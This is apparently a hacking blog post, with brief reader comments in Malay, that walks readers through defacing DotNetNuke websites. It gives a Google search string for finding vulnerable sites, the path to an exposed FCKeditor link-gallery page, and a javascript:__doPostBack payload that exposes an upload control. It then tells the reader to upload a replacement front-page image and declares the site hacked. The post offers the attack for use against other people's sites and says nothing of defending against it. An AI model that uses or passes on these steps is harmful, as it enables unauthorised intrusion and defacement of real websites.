First Check whether the Website is vulnerable or not( if you don't know how to do it, read this)
Or simply copy this code to google and hit enter:
inurl:/portals/0
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.example.com ..the image is located at location- http://www.example.com/Portals/0/SHM.jpg
Yeah... it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
Credits-SBKiller
nak view pic tu camne?
ReplyDeletewww.target.com/portals/0/pic.jpg
ReplyDeleteportals/0/picawakupload
ReplyDeletex pham...
ReplyDeleteBaca betul2..
ReplyDelete